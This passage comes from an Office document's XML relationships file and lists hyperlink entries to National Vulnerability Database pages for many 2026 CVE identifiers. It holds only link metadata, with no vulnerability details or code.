Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72001" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78583" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79746" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82302" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85160" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76139" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84934" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84935" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82636" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85649" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18444" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18445" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 